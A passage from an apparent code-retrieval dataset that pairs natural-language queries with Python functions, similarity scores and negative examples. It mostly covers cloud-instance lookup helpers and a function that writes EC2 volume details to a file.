log.exception(\"Exception retrieving InstanceId\")\n _instance_id = None\n\n return _instance_id", "def get_instance(self, instance):\n\n title = list(instance.keys())[0]\n instance = instance.get(title)\n return instance", "def get_instance(self, name):\n return self.store.instance.id", "def get_instance_info(inst):\n instance_info = {'id': inst.id,\n 'private_ip': inst.inner_ip_address,\n 'public_ip': inst.public_ip_address,\n 'image_id': inst.image_id,\n 'zone_id': inst.zone_id,\n 'region_id': inst.region_id,\n 'launch_time': inst.creation_time,\n 'instance_type': inst.instance_type,\n 'state': inst.state,\n 'tags': inst.tags,\n # 'groups': dict((group.id, group.name) for group in inst.groups),\n # 'groups': dict((group, group) for group in inst.groups),\n 'vpc_id': inst.vpc_id,\n 'subnet_id': inst.subnet_id,\n 'vpc_private_ip': inst.vpc_private_ip,\n 'eip': inst.eip,\n 'io_optimized': inst.io_optimized\n }\n try:\n bdm_dict = {}\n bdm = getattr(inst, 'block_device_mapping')\n for device_name in bdm.keys():\n bdm_dict[device_name] = {\n 'status': bdm[device_name].status,\n 'volume_id': bdm[device_name].volume_id,\n 'delete_on_termination': bdm[device_name].delete_on_termination\n }\n instance_info['block_device_mapping'] = bdm_dict\n except AttributeError:\n instance_info['block_device_mapping'] = False\n\n return instance_info", "def instance(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"instance\")", "def instance(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"instance\")", "def instance_id(self) -> str:\n return pulumi.get(self, \"instance_id\")", "def get_self_instance_id():\n\n logging.debug('get_self_instance_id()')\n response = urllib2.urlopen('http://169.254.169.254/1.0/meta-data/instance-id')\n instance_id = response.read()\n return instance_id", "def get_instance(self, instance_id, **kwargs):\r\n\r\n if 'mask' not in kwargs:\r\n items = [\r\n 'id',\r\n 'globalIdentifier',\r\n 'fullyQualifiedDomainName',\r\n 'hostname',\r\n 'domain',\r\n 'createDate',\r\n 'modifyDate',\r\n 'provisionDate',\r\n 'notes',\r\n 'dedicatedAccountHostOnlyFlag',\r\n 'privateNetworkOnlyFlag',\r\n 'primaryBackendIpAddress',\r\n 'primaryIpAddress',\r\n '''networkComponents[id, status, speed, maxSpeed, name,\r\n macAddress, primaryIpAddress, port,\r\n primarySubnet]''',\r\n 'lastKnownPowerState.name',\r\n 'powerState',\r\n 'status',\r\n 'maxCpu',\r\n 'maxMemory',\r\n 'datacenter',\r\n 'activeTransaction[id, transactionStatus[friendlyName,name]]',\r\n 'lastOperatingSystemReload.id',\r\n 'blockDevices',\r\n 'blockDeviceTemplateGroup[id, name, globalIdentifier]',\r\n 'postInstallScriptUri',\r\n 'userData',\r\n '''operatingSystem[passwords[username,password],\r\n softwareLicense.softwareDescription[\r\n manufacturer,name,version,\r\n referenceCode]]''',\r\n 'hourlyBillingFlag',\r\n 'billingItem.recurringFee',\r\n 'tagReferences[id,tag[name,id]]',\r\n 'networkVlans[id,vlanNumber,networkSpace]',\r\n ]\r\n kwargs['mask'] = \"mask[%s]\" % ','.join(items)\r\n\r\n return self.guest.getObject(id=instance_id, **kwargs)", "def get_app_instance_obj(self, instance_id, instance_alias=None):\n try:\n if instance_id:\n return filter(lambda app_inst: app_inst.id == instance_id, self.app_instances)[0]\n elif instance_alias:\n return filter(lambda app_inst: app_inst.alias == instance_alias, self.app_instances)[0]\n except:\n return None", "def run_instance():\n ami_id = \"ami-04876f29fd3a5e8ba\" # AMI Id\n instance_type = \"t2.micro\" # Instance Type\n tag_specs = [\n {\n 'ResourceType': 'instance',\n 'Tags': [\n {\n 'Key': 'Name',\n 'Value': 'BoB10@ProductDev.sdk.8084'\n }\n ]\n }\n ]\n\n # Instantiate the service resource object\n ec2_resource = session.resource('ec2', region_name=region)\n # Run an instance\n\n instances = ec2_resource.create_instances(ImageId=ami_id, InstanceType=instance_type,\n MaxCount=1, MinCount=1, KeyName='BoB10@ProductDev.8084',\n TagSpecifications=tag_specs, \n SecurityGroupIds=['sg-06b757b4bb272d98f'],\n UserData=assemble_userdata().as_string())\n Instance_id = instances[0].id\n print('\\nInstance Id: ' + Instance_id)\n print('Image Id: ' + instances[0].image_id)\n print('Instance Type: ' + instances[0].instance_type)\n print('State: ' + instances[0].state['Name'])\n return Instance_id", "def _get_instance(self):\n #return '_earth_instance_' + rospy.get_name().strip('/')\n return self.instance", "def find_by_instance_id(self, instance_id: str) -> Optional[StorageObject]:\n return self._store.get(instance_id, None)", "def get_instance(self, zone, instance, fields=None):\n assert is_valid_zone(zone), zone\n assert is_valid_instance(instance), instance\n try:\n return self.call_api(\n '/zones/%s/instances/%s' % (zone, instance),\n params={'fields': ','.join(fields)} if fields else None)\n except net.NotFoundError: # pragma: no cover\n return None", "def GetInstance(\n self,\n instance_name: str,\n resource_group_name: Optional[str] = None) -> 'AZComputeVirtualMachine':\n instances = self.ListInstances(resource_group_name=resource_group_name)\n if instance_name not in instances:\n raise errors.ResourceNotFoundError(\n 'Instance {0:s} was not found in subscription {1:s}'.format(\n instance_name, self.az_account.subscription_id), __name__)\n return instances[instance_name]", "def find_instance(self, name_or_id, ignore_missing=True):\n return self._find(\n _instance.Instance, name_or_id, ignore_missing=ignore_missing\n )", "def get_tag_for_instance(self, instance_id, tag_key):\n tags = self.get_tags_for_instance(instance_id)\n for tag in tags:\n if tag['Key'] == tag_key:\n return tag['Value']\n return None", "def _create_instance(cls, hook: EC2Hook):\n conn = hook.get_conn()\n try:\n ec2_client = conn.meta.client\n except AttributeError:\n ec2_client = conn\n\n # We need existed AMI Image ID otherwise `moto` will raise DeprecationWarning.\n images = ec2_client.describe_images()[\"Images\"]\n response = ec2_client.run_instances(MaxCount=1, MinCount=1, ImageId=images[0][\"ImageId\"])\n return response[\"Instances\"][0][\"InstanceId\"]", "def source_instance(self) -> 'outputs.InstanceReferenceResponse':\n return pulumi.get(self, \"source_instance\")", "def instance_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"instance_id\")", "def instance(self):\n return self._instance", "def instance_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_id\")", "def find_vcs_instance_ept(self, country, amazon_seller, instance_dict):\n instance_obj = self.env['amazon.instance.ept']\n instance = instance_obj.browse( \\\n instance_dict.get((country.id, amazon_seller.id), False))\n if not instance:\n instance = amazon_seller.instance_ids.filtered( \\\n lambda x: x.country_id.id == country.id)\n if instance:\n instance_dict.update( \\\n {(country.id, amazon_seller.id): instance.id})\n return instance", "def show_instance(name, session=None, call=None):\n if call == \"function\":\n raise SaltCloudException(\n \"The show_instnce function must be called with -a or --action.\"\n )\n log.debug(\"show_instance-> name: %s session: %s\", name, session)\n if session is None:\n session = _get_session()\n vm = _get_vm(name, session=session)\n record = session.xenapi.VM.get_record(vm)\n if not record[\"is_a_template\"] and not record[\"is_control_domain\"]:\n try:\n base_template_name = record[\"other_config\"][\"base_template_name\"]\n except Exception: # pylint: disable=broad-except\n base_template_name = None\n log.debug(\n \"VM %s, does not have base_template_name attribute\",\n record[\"name_label\"],\n )\n ret = {\n \"id\": record[\"uuid\"],\n \"image\": base_template_name,\n \"name\": record[\"name_label\"],\n \"size\": record[\"memory_dynamic_max\"],\n \"state\": record[\"power_state\"],\n \"private_ips\": get_vm_ip(name, session),\n \"public_ips\": None,\n }\n\n __utils__[\"cloud.cache_node\"](ret, _get_active_provider_name(), __opts__)\n return ret", "def instance_id(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"instance_id\")", "def get_instance(self, node_id: str) -> \"GCPNode\":\n return", "def instance_id(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"instance_id\")", "def instance_spec(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"instance_spec\")", "def describe_instance(instance_id):\n # Instantiate the service resource object\n ec2_resource = session.resource('ec2', region_name=region)\n try:\n # Describe an instance\n instance = ec2_resource.Instance(instance_id)\n print('\\nInstance Id: ' + instance_id)\n print('Instance Id: ' + instance.id)\n print('Image Id: ' + instance.image_id)\n print('Instance Type: ' + instance.instance_type)\n print('State: ' + instance.state['Name'])\n if instance.state['Name'] == 'running':\n print('Private DNS Name: ' + instance.private_dns_name)\n print('Private IP: ' + instance.private_ip_address)\n print('Public DNS Name: ' + instance.public_dns_name)\n print('Public IP: ' + instance.public_ip_address)\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == \"MissingParameter\":\n print(\"Error: Missing instance id!!\")\n else:\n raise\n return", "def _get_marker_instance(ctx, marker):\n\n try:\n im = objects.InstanceMapping.get_by_instance_uuid(ctx, marker)\n except exception.InstanceMappingNotFound:\n raise exception.MarkerNotFound(marker=marker)\n\n elevated = ctx.elevated(read_deleted='yes')\n with context.target_cell(elevated, im.cell_mapping) as cctx:\n try:\n db_inst = db.instance_get_by_uuid(cctx, marker,\n columns_to_join=[])\n except exception.InstanceNotFound:\n db_inst = None\n if not db_inst:\n raise exception.MarkerNotFound(marker=marker)\n return db_inst", "def instance_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Output[int]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Output[int]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Output[int]:\n return pulumi.get(self, \"instance_id\")", "def get_primitive_instance_by_uuid(context, instance_uuid):\n instance = db.instance_get_by_uuid(context, instance_uuid)\n return jsonutils.to_primitive(instance)", "def get_instance(self, name):\n return self.website.instance.id", "def get_instance(instance_id: Optional[str] = None,\n location: Optional[str] = None,\n project: Optional[str] = None,\n opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetInstanceResult:\n __args__ = dict()\n __args__['instanceId'] = instance_id\n __args__['location'] = location\n __args__['project'] = project\n opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)\n __ret__ = pulumi.runtime.invoke('google-native:file/v1beta1:getInstance', __args__, opts=opts, typ=GetInstanceResult).value\n\n return AwaitableGetInstanceResult(\n capacity_gb=pulumi.get(__ret__, 'capacity_gb'),\n capacity_step_size_gb=pulumi.get(__ret__, 'capacity_step_size_gb'),\n create_time=pulumi.get(__ret__, 'create_time'),\n description=pulumi.get(__ret__, 'description'),\n directory_services=pulumi.get(__ret__, 'directory_services'),\n etag=pulumi.get(__ret__, 'etag'),\n file_shares=pulumi.get(__ret__, 'file_shares'),\n kms_key_name=pulumi.get(__ret__, 'kms_key_name'),\n labels=pulumi.get(__ret__, 'labels'),\n max_capacity_gb=pulumi.get(__ret__, 'max_capacity_gb'),\n max_share_count=pulumi.get(__ret__, 'max_share_count'),\n multi_share_enabled=pulumi.get(__ret__, 'multi_share_enabled'),\n name=pulumi.get(__ret__, 'name'),\n networks=pulumi.get(__ret__, 'networks'),\n protocol=pulumi.get(__ret__, 'protocol'),\n satisfies_pzs=pulumi.get(__ret__, 'satisfies_pzs'),\n state=pulumi.get(__ret__, 'state'),\n status_message=pulumi.get(__ret__, 'status_message'),\n suspension_reasons=pulumi.get(__ret__, 'suspension_reasons'),\n tier=pulumi.get(__ret__, 'tier'))", "def get_instance_template(self, name):\n return self.call_api('/global/instanceTemplates/%s' % name)", "def get_this_instance(settings, instance_id_ip, ip_given=False):\n instances = get_all_instances(settings)\n for instance in instances:\n if ip_given:\n current_ip = get_instance_ip(instance)\n if current_ip == instance_id_ip:\n return instance\n else:\n if instance.id == instance_id_ip:\n return instance", "def _get_instance(self):", "def _get_instance(self):", "def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n connection_string: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n instance_charge_type: Optional[pulumi.Input[str]] = None,\n instance_series: Optional[pulumi.Input[str]] = None,\n mysql_version: Optional[pulumi.Input[int]] = None,\n port: Optional[pulumi.Input[str]] = None,\n specification: Optional[pulumi.Input[str]] = None,\n vpc_id: Optional[pulumi.Input[str]] = None,\n vswitch_id: Optional[pulumi.Input[str]] = None,\n zone_id: Optional[pulumi.Input[str]] = None) -> 'Instance':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _InstanceState.__new__(_InstanceState)\n\n __props__.__dict__[\"connection_string\"] = connection_string\n __props__.__dict__[\"description\"] = description\n __props__.__dict__[\"instance_charge_type\"] = instance_charge_type\n __props__.__dict__[\"instance_series\"] = instance_series\n __props__.__dict__[\"mysql_version\"] = mysql_version\n __props__.__dict__[\"port\"] = port\n __props__.__dict__[\"specification\"] = specification\n __props__.__dict__[\"vpc_id\"] = vpc_id\n __props__.__dict__[\"vswitch_id\"] = vswitch_id\n __props__.__dict__[\"zone_id\"] = zone_id\n return Instance(resource_name, opts=opts, __props__=__props__)", "def instance_spec(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_spec\")", "def instance_spec(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_spec\")", "def get_instance(*, db_session, instance_id: int) -> WorkflowInstance:\n return (\n db_session.query(WorkflowInstance).filter(WorkflowInstance.id == instance_id).one_or_none()\n )", "def _instance_metadata(self, context, instance_uuid):\n return db.instance_metadata_get(context, instance_uuid)", "def target_instance(self):\n return self._target_instance", "def get_instance(instance_id: Optional[str] = None,\n location: Optional[str] = None,\n project: Optional[str] = None,\n opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetInstanceResult:\n __args__ = dict()\n __args__['instanceId'] = instance_id\n __args__['location'] = location\n __args__['project'] = project\n opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)\n __ret__ = pulumi.runtime.invoke('google-native:datafusion/v1beta1:getInstance', __args__, opts=opts, typ=GetInstanceResult).value\n\n return AwaitableGetInstanceResult(\n accelerators=pulumi.get(__ret__, 'accelerators'),\n api_endpoint=pulumi.get(__ret__, 'api_endpoint'),\n available_version=pulumi.get(__ret__, 'available_version'),\n create_time=pulumi.get(__ret__, 'create_time'),\n crypto_key_config=pulumi.get(__ret__, 'crypto_key_config'),\n dataproc_service_account=pulumi.get(__ret__, 'dataproc_service_account'),\n description=pulumi.get(__ret__, 'description'),\n disabled_reason=pulumi.get(__ret__, 'disabled_reason'),\n display_name=pulumi.get(__ret__, 'display_name'),\n enable_rbac=pulumi.get(__ret__, 'enable_rbac'),\n enable_stackdriver_logging=pulumi.get(__ret__, 'enable_stackdriver_logging'),\n enable_stackdriver_monitoring=pulumi.get(__ret__, 'enable_stackdriver_monitoring'),\n enable_zone_separation=pulumi.get(__ret__, 'enable_zone_separation'),\n event_publish_config=pulumi.get(__ret__, 'event_publish_config'),\n gcs_bucket=pulumi.get(__ret__, 'gcs_bucket'),\n labels=pulumi.get(__ret__, 'labels'),\n name=pulumi.get(__ret__, 'name'),\n network_config=pulumi.get(__ret__, 'network_config'),\n options=pulumi.get(__ret__, 'options'),\n p4_service_account=pulumi.get(__ret__, 'p4_service_account'),\n private_instance=pulumi.get(__ret__, 'private_instance'),\n satisfies_pzs=pulumi.get(__ret__, 'satisfies_pzs'),\n service_account=pulumi.get(__ret__, 'service_account'),\n service_endpoint=pulumi.get(__ret__, 'service_endpoint'),\n state=pulumi.get(__ret__, 'state'),\n state_message=pulumi.get(__ret__, 'state_message'),\n tenant_project_id=pulumi.get(__ret__, 'tenant_project_id'),\n type=pulumi.get(__ret__, 'type'),\n update_time=pulumi.get(__ret__, 'update_time'),\n version=pulumi.get(__ret__, 'version'),\n zone=pulumi.get(__ret__, 'zone'))", "def instance_view(self) -> 'outputs.DedicatedHostInstanceViewResponse':\n return pulumi.get(self, \"instance_view\")", "def instance(self):\n return self.__instance", "def GetInstance():\n pass", "def name(self):\n return self._client.project_name + '/instances/' + self.instance_id", "def Get(self, instance_name, zone):\n project = properties.VALUES.core.project.Get(required=True)\n request = self.messages.ComputeInstancesGetRequest(\n zone=zone, project=project, instance=instance_name)\n instance = self.client.instances.Get(request)\n if self._VMCreatedByExecGroup(instance):\n return instance\n raise HttpNotFoundError(\n 'Instance:{} not found'.format(instance_name), None, None)", "def get_info(self, instance):\n shutdown_staues = ['deallocating', 'deallocated',\n 'stopping', 'stopped']\n instance_id = instance.uuid\n state = power_state.NOSTATE\n status = 'Unkown'\n try:\n vm = self.compute.virtual_machines.get(\n CONF.azure.resource_group, instance_id, expand='instanceView')\n # azure may raise msrestazure.azure_exceptions CloudError\n except exception.CloudError as e:\n msg = six.text_type(e)\n if 'ResourceNotFound' in msg:\n raise nova_ex.InstanceNotFound(instance_id=instance.uuid)\n else:\n LOG.exception(msg)\n ex = exception.InstanceGetFailure(reason=six.text_type(e),\n instance_uuid=instance_id)\n raise ex\n except Exception as e:\n msg = six.text_type(e)\n LOG.exception(msg)\n ex = exception.InstanceGetFailure(reason=six.text_type(e),\n instance_uuid=instance_id)\n raise ex\n else:\n LOG.debug('vm info is: {}'.format(vm))\n if vm and hasattr(vm, 'instance_view') and \\\n hasattr(vm.instance_view, 'statuses') and \\\n vm.instance_view.statuses is not None:\n for i in vm.instance_view.statuses:\n if hasattr(i, 'code') and \\\n i.code and 'PowerState' in i.code:\n status = i.code.split('/')[-1]\n if 'running' == status:\n state = power_state.RUNNING\n elif status in shutdown_staues:\n state = power_state.SHUTDOWN\n break\n LOG.info(_LI('vm: %(instance_id)s state is : %(status)s'),\n dict(instance_id=instance_id, status=status))\n return InstanceInfo(state=state, id=instance_id)", "def get_instance(self, container, cls, **params):\n if not cls in self.instances:\n self.instances[cls] = self.create_instance(container, cls, **params)\n \n return self.instances[cls]", "def readInstance(\n self,\n key,\n makeGlyphs=True,\n makeKerning=True,\n makeInfo=True,\n bendLocations=False,\n ):\n attrib, value = key\n for instanceElement in self.root.findall('.instances/instance'):\n if instanceElement.attrib.get(attrib) == value:\n self._readSingleInstanceElement(\n instanceElement,\n makeGlyphs=makeGlyphs,\n makeKerning=makeKerning,\n makeInfo=makeInfo,\n bendLocations=bendLocations,\n )\n return\n raise MutatorError(\"No instance found with key: (%s, %s).\" % key)", "def instance_identifier(self):\n return self._instance_identifier", "def get_instance(cls, pid, instance_id=None):\n if not instance_id:\n # Find an available instance.\n for inst in cls._instance_pool:\n if not inst.locked:\n inst._acquire_lock(pid)\n \n\n if hasattr(cls, \"_pyroDaemon\"):\n cls._pyroDaemon.register(inst)\n \n\n return inst\n # Otherwise make a new instance if possible\n if cls.managed:\n if cls.MAXINSTANCES is None or cls.ninstances < cls.MAXINSTANCES:\n instance_id = cls.ninstances if instance_id is None else instance_id\n\n cls.ninstances += 1\n # Make the status directory.\n\n if hasattr(cls, \"_pyroDaemon\"):\n status_dir = os.path.join(cls.STATUS_DIR, 'mc_{}'.format(cls.ninstances))\n if not os.path.exists(status_dir):\n os.makedirs(status_dir)\n else:\n status_dir = None\n\n inst = cls.Instance(cls._get_valid_port(), status_dir=status_dir, instance_id=instance_id)\n cls._instance_pool.append(inst)\n inst._acquire_lock(pid)\n\n if hasattr(cls, \"_pyroDaemon\"):\n cls._pyroDaemon.register(inst)\n\n return inst\n \n else:\n raise RuntimeError(\"No available instances and max instances reached! :O :O\")\n else:\n raise RuntimeError(\"No available instances and managed flag is off\")", "def get_instance_id(event):\n try:\n return event['detail']['instance-id']\n except KeyError as err:\n LOGGER.error(err)\n return False", "def get_instance(self, data):\n if self.transient:\n return None\n props = get_primary_keys(self.opts.model)\n filters = {prop.key: data.get(prop.key) for prop in props}\n if None not in filters.values():\n return self.session.query(self.opts.model).filter_by(**filters).first()\n return None", "def _aws_get_instance_by_tag(region, name, tag, raw):\n client = boto3.session.Session().client('ec2', region)\n matching_reservations = client.describe_instances(Filters=[{'Name': tag, 'Values': [name]}]).get('Reservations', [])\n instances = []\n [[instances.append(_aws_instance_from_dict(region, instance, raw)) # pylint: disable=expression-not-assigned\n for instance in reservation.get('Instances')] for reservation in matching_reservations if reservation]\n return instances", "def __get__(self, instance, owner=None):\r\n # Handle access on the model (i.e. Link.tags)\r\n if instance is None:\r\n return edit_string_for_tags(Tag.objects.usage_for_model(owner))\r\n\r\n tags = self._get_instance_tag_cache(instance)\r\n if tags is None:\r\n if instance.pk is None:\r\n self._set_instance_tag_cache(instance, '')\r\n else:\r\n self._set_instance_tag_cache(\r\n instance, edit_string_for_tags(Tag.objects.get_for_object(instance)))\r\n return self._get_instance_tag_cache(instance)", "def do_instance_show(cs, args):\n try:\n instance = cs.instances.detail(args.instance)\n except exceptions.NotFound as e:\n msg = \"No server with an id of '%s' exists\" % args.instance\n e.message = msg\n raise\n\n _print_server_details(instance)", "def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None) -> 'Instance':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = InstanceArgs.__new__(InstanceArgs)\n\n __props__.__dict__[\"create_time\"] = None\n __props__.__dict__[\"description\"] = None\n __props__.__dict__[\"etag\"] = None\n __props__.__dict__[\"file_shares\"] = None\n __props__.__dict__[\"instance_id\"] = None\n __props__.__dict__[\"kms_key_name\"] = None\n __props__.__dict__[\"labels\"] = None\n __props__.__dict__[\"location\"] = None\n __props__.__dict__[\"name\"] = None\n __props__.__dict__[\"networks\"] = None\n __props__.__dict__[\"project\"] = None\n __props__.__dict__[\"satisfies_pzs\"] = None\n __props__.__dict__[\"state\"] = None\n __props__.__dict__[\"status_message\"] = None\n __props__.__dict__[\"suspension_reasons\"] = None\n __props__.__dict__[\"tier\"] = None\n return Instance(resource_name, opts=opts, __props__=__props__)", "def show_instance(name, call=None):\n if call != \"action\":\n raise SaltCloudSystemExit(\n \"The show_instance action must be called with -a or --action.\"\n )\n\n nodes = list_nodes_full()\n __utils__[\"cloud.cache_node\"](nodes[name], _get_active_provider_name(), __opts__)\n return nodes[name]", "def get_instance(self, ix=None, name=None):\n assert ix is None or name is None\n if ix is None:\n instance = [ex for ex in self.instances if ex.name == name]\n assert len(instance) == 1\n return instance[0]\n else:\n return self.instances[ix]", "def GetMatchingInstance(instances, service=None, version=None, instance=None):\n if not instance:\n return SelectInstanceInteractive(instances, service=service,\n version=version)\n\n matching = FilterInstances(instances, service, version, instance)\n if len(matching) > 1:\n raise InvalidInstanceSpecificationError(\n 'More than one instance matches the given specification.\\n\\n'\n 'Matching instances: {0}'.format(map(str, sorted(matching))))\n elif not matching:\n raise InvalidInstanceSpecificationError(\n 'No instances match the given specification.\\n\\n'\n 'All instances: {0}'.format(map(str, sorted(instances))))\n return matching[0]" ]
[ "0.7441181", "0.7072989", "0.7054633", "0.7043838", "0.6983329", "0.69746256", "0.6915153", "0.6853248", "0.65906733", "0.65776145", "0.65776145", "0.65766394", "0.65577894", "0.65343606", "0.6420164", "0.6343189", "0.63384813", "0.63070196", "0.6281745", "0.62794745", "0.6265967", "0.62485546", "0.6241711", "0.6218576", "0.6211774", "0.6209884", "0.62071157", "0.62013066", "0.6147452", "0.61253107", "0.60900754", "0.60791045", "0.6035864", "0.6024225", "0.6010483", "0.5989189", "0.5989189", "0.5989189", "0.5989189", "0.5989189", "0.5989189", "0.59464186", "0.59444517", "0.59444517", "0.59444517", "0.59444517", "0.59091127", "0.5899663", "0.5880838", "0.5880838", "0.5880838", "0.5865778", "0.5859556", "0.5859556", "0.5859556", "0.5849953", "0.58484876", "0.5842656", "0.583499", "0.583499", "0.583499", "0.583499", "0.583499", "0.583499", "0.582623", "0.582623", "0.582623", "0.5816187", "0.5811985", "0.5808328", "0.5807185", "0.58009654", "0.57831466", "0.57831466", "0.5755083", "0.57521784", "0.57521784", "0.5749333", "0.5720636", "0.5716035", "0.5715815", "0.57142323", "0.57101494", "0.56968844", "0.56968284", "0.5692247", "0.5679578", "0.56722987", "0.5662924", "0.5643318", "0.5617047", "0.5613363", "0.56090915", "0.5608364", "0.5597738", "0.55911267", "0.558588", "0.5584785", "0.5575685", "0.5567781" ]
0.70240617
4
Write volumes to file
def generateInfoVolumes(regions): print "\nWriting volumes info to output file %s" % volumes_data_output_file with open(volumes_data_output_file, 'w') as f1: f1.write("VOLUMES\n") f1.write( "Name\tvolume_ID\tKEEP-tag_of_volume\tKEEP-tag_of_instance\tproduction?\tvolume_attachment_state\tassociated_instance\tinstance_state\tsize\tcreate_time\tregion\tzone\tassociated_snapshot\n\n") for r in regions: volumes = getVolumes(r) print "." # give some feedback to the user for v in volumes: f1.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n" % (get_name_tag(v), v.id, getKeepTag(v), getKeepTag(getInstanceOf(v)), isProduction(v), v.attachment_state(), v.attach_data.instance_id, v.status, v.size, v.create_time, v.region.name, v.zone, v.snapshot_id))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def write_inventory_file(inventory_item):\n try:\n with open('inventory', 'w') as file:\n file.write(inventory_item)\n except OSError:\n pass", "def write(self, filename):\n pass", "def write(self, filename):\n pass", "def add_writable_file_volume(self,\n runtime, # type: List[Text]\n volume, # type: MapperEnt\n host_outdir_tgt, # type: Optional[Text]\n tmpdir_prefix # type: Text\n ):\n if self.inplace_update:\n self._add_volume_binding(volume.resolved, volume.target, writable=True)\n else:\n if host_outdir_tgt:\n # shortcut, just copy to the output directory\n # which is already going to be mounted\n log.debug('shutil.copy({}, {})'.format(volume.resolved, host_outdir_tgt))\n shutil.copy(volume.resolved, host_outdir_tgt)\n else:\n log.debug('tempfile.mkdtemp(dir={})'.format(self.tmpdir))\n tmpdir = tempfile.mkdtemp(dir=self.tmpdir)\n file_copy = os.path.join(\n tmpdir, os.path.basename(volume.resolved))\n log.debug('shutil.copy({}, {})'.format(volume.resolved, file_copy))\n shutil.copy(volume.resolved, file_copy)\n self._add_volume_binding(file_copy, volume.target, writable=True)\n ensure_writable(host_outdir_tgt or file_copy)", "def write(cls, vas):\n with open(Y, 'w') as f_i:\n for items in vas:\n f_i.write('%s ' % items)\n print(\"File written successfully. Check out \\\"output.txt\\\" file\")\n f_i.close()", "def write_to_file(self, filename: str) -> None:", "def setupVolumes(volumes: Volumes) -> None:\n volumesList = readProcessJson(\n [\"podman\", \"volume\", \"ls\", \"--format\", \"json\"])\n existingVolumes: Set[str] = set()\n if volumesList:\n for volume in volumesList:\n existingVolumes.add(volume['name'])\n for volume in volumes.values():\n if volume.name not in existingVolumes:\n log.info(f\"Creating volume {volume.name}\")\n execute([\"podman\", \"volume\", \"create\", volume.name])\n if volume.files:\n for file in volume.files:\n path = Path(\"~/.local/share/containers/storage/volumes/\"\n f\"{volume.name}/_data/{file.name}\").expanduser()\n if not path.exists():\n log.info(f\"Writting {path}\")\n path.write_text(file.content)", "def write_to_file(inventory):\n env = Environment(loader=FileSystemLoader('templates'), trim_blocks=True)\n output_template = env.get_template('output.j2')\n # create and clean an 'outputs' folder\n path = \"./outputs\"\n try:\n shutil.rmtree(path, ignore_errors = True, onerror = None)\n except:\n print('Error while deleting directory')\n os.mkdir(path)\n os.chdir(path)\n for node, node_data in inventory.items():\n if 'outputs' in node_data:\n os.mkdir(node)\n for command, output in node_data['outputs'].items():\n # when creating filenames based on command, swap 'spaces' with 'underscores':\n command = re.sub(r\"\\s\", r\"_\", command)\n open(f\"{node}/{command}.txt\", 'a').write(\n output_template.render(node=node, data=output))\n print(\"\\n\" + f\"Job complete. If data gathering was successful, see 'outputs' directory.\")\n return inventory", "def volumes(self):", "def add_volume_info(self, vi):\n vol_num = vi.volume_number\n self.volume_info_dict[vol_num] = vi\n if self.fh:\n self.fh.write(vi.to_string() + \"\\n\")", "def write_to_disk(self):\n\n\t\t# print \"--------------------------------------------------------WRITING PIECE %r TO DISK\" %self.index\n\t\ttry:\n\t\t\tos.makedirs(PATH)\n\t\texcept:\n\t\t\tpass\n\t\tself.piece_file_name = os.path.join(PATH, self.torrent.name+'.'+'00'+str(self.index))\n\t\t# print \"Saving piece to file name: \", self.piece_file_name\n\t\tpiece_file = open(self.piece_file_name, 'w')\n\t\tpiece_file.write(self.data)\n\t\tpiece_file.close()", "def write (self, file):\n\t\tfile.write (self.pack ())", "def write(self, filename, data):\n owner_rw = 0600\n fd = os.open(filename, os.O_WRONLY | os.O_CREAT, owner_rw)\n # In case file existed already with wrong permissions, fix them.\n os.chmod(filename, owner_rw)\n os.write(fd, data)\n os.close(fd)", "def save(self, filepath: str | Path) -> None:\n extension = 